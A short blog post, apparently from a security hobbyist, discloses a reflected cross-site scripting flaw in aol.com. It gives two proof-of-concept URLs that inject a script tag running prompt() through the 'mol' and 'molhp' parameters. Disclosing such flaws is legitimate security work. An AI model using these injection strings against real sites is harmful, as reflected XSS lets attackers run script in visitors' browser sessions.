/ / / Cross Site Scripting In Aol.com

Cross Site Scripting In Aol.com

, Edit




Hello friends today i am posting my XSS find in Aol.com which was once leading Search and social media site. I was looking for some movie to watch when i came across it and was just checking it and got an XSS :D

POC :-



URL :-

http://www.aol.com/?molhp=txtlnkusaolp00000051914f3 …<%2fscript><script>prompt(/Osama Mahmood/)<%2fscript>083afa69f8a&icid=acm50mtmhpusermenu

http://www.aol.com/?mol=acm50overlaynl031213a8345 …<%2fscript><script>prompt(/Osama Mahmood/)<%2fscript>22606c823c6&icid=acm50newslettersignup&shw=1

these two parameters were vulnerable to XSS :-

?mol= and ?molhp=

Thanks,
I hope you like it
Share on Google Plus
Unknown

About Unknown

Hi , This is Osama Mahmood and i will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. follow me on twitter @OsamaMahmood007
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Subscribe to: Post Comments ( Atom )